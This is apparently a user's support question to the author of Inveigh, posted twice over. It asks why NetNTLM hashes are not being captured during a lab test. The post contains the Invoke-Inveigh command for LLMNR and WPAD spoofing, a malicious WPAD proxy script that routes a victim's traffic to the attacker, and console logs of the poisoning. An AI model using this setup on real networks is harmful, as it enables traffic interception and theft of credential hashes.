I'm running Inveigh on the "attacker" machine (192.168.100.101) from an elevated shell using these parameters:
Invoke-Inveigh -IP 192.168.100.101 -ConsoleOutput Y -Proxy Y -WPADAuth Anonymous
In the victim machine (192.168.100.23) sniffing traffic with Wireshark I see the Inveigh host WPAD response:
function FindProxyForURL(url,host){ return "PROXY 192.168.100.101:8492; PROXY 192.168.100.101:8493; DIRECT";}
After that I'm seeing the target browser initiating a request through the proxy, receiving a 407 Unauthorized and executing the challenge response process:
The console output is confirming the wireshark output captured at the victim machine:
[+] [2020-04-09T18:57:51] LLMNR request for wpad received from 192.168.100.23 [response sent]
[+] [2020-04-09T18:57:51] TCP(80) SYN packet detected from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) GET request for /wpad.dat received from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) host header wpad received from 192.168.100.23:59790
[+] [2020-04-09T18:57:51] HTTP(80) user agent received from 192.168.100.23:59790:
Mozilla/4.0 (compatible; MSIE 7.0; Win32)
[+] [2020-04-09T18:57:51] TCP(8492) SYN packet detected from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) CONNECT request for www.google.es:443 received from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) host header www.google.es received from 192.168.100.23:59791
[+] [2020-04-09T18:57:52] Proxy(8492) user agent received from 192.168.100.23:59791:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727)
[+] [2020-04-09T18:57:52] TCP(8492) SYN packet detected from 192.168.100.23:59792
[+] [2020-04-09T18:57:52] TCP(8493) SYN packet detected from 192.168.100.23:59793
[+] [2020-04-09T18:57:55] TCP(8493) SYN packet detected from 192.168.100.23:59793
Hello Kevin,
First I would to thank you for such great tool.
I'm running Inveigh on the "attacker" machine (
192.168.100.101
) from an elevated shell using these parameters:Invoke-Inveigh -IP 192.168.100.101 -ConsoleOutput Y -Proxy Y -WPADAuth Anonymous
In the victim machine (
192.168.100.23
) sniffing traffic with Wireshark I see the Inveigh host WPAD response:function FindProxyForURL(url,host){ return "PROXY 192.168.100.101:8492; PROXY 192.168.100.101:8493; DIRECT";}
After that I'm seeing the target browser initiating a request through the proxy, receiving a 407 Unauthorized and executing the challenge response process:
The console output is confirming the wireshark output captured at the victim machine:
Why Inveigh is not able of get the NetNTLM hash?
Thanks in advance!